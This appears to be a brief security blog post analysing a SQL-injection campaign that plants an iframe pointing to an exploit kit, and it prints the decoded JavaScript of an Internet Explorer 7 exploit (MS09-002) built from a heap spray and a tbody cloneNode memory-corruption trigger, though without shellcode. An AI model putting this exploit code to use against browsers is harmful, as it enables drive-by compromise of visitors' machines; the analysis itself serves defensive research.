this is a new script that are being sql-injected.

z.js contains a iframe from

The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.

The IE7 exploit is decoded as follows:

var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
var test99=yumen;
var yumen=new Array();
while(b.length<0x100000-(ttt.length*2+0x01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0x01020)/2);
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
function ok(){o1=document.createElement(“tbody”);;
var o2=o1.cloneNode();
for(var x=0; x<a1.length; x++)a1[x].src=s1;}


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: